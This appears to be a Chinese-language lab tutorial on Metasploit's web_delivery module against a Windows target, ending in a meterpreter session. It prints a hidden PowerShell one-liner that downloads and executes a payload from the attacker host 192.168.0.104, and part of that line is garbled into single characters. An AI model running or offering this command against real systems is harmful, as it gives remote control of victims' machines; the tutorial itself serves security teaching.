介绍下webdelivery模块
先是启动metasploit
接下来选择我们使用的模块
Show options看看我们需要设置哪些参数
我们注意到,exploit target出现了python,,莫非还有其他的?我们使用show targets来看看
2代表的PSH表示的powershell。我们这次的实验针对的是windows的,考虑到不是所有windows用户都会有python,php的环境,所以不如我们选择powershell吧
所以我们set target 2
再show options看看还需要设置哪些
我们依次设置好就可以了
接下来执行攻击
可以看到我们接收到一串字符串如下:
powershell.exe -nop -w hidden -c
M
=
n
e
w
−
o
b
j
e
c
t
n
e
t
.
w
e
b
c
l
i
e
n
t
;
M=new-object net.webclient;
M=new−objectnet.webclient;M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring(‘http://192.168.0.104:8080/’);
我们只需要把这串字符串在windows环境下cmd中执行就可以了
然后回车
这时候回到kali
可以看到
说明攻击成功了
可以看下会话列表
注:此处102是我们的靶机,104是我们的攻击机
我们在上图顺便指定了拿到的会话,这就就来到了meterpreter的交互
拿到meterpreter之后可以做什么呢?我们在metasploit后渗透的课程里已经给大家介绍过了,这里就不再重复了~~
扩展资料:https://www.anquanke.com/post/id/86784(与此模块相关的关于劫持无线鼠标的资料,有兴趣的同学可以看看)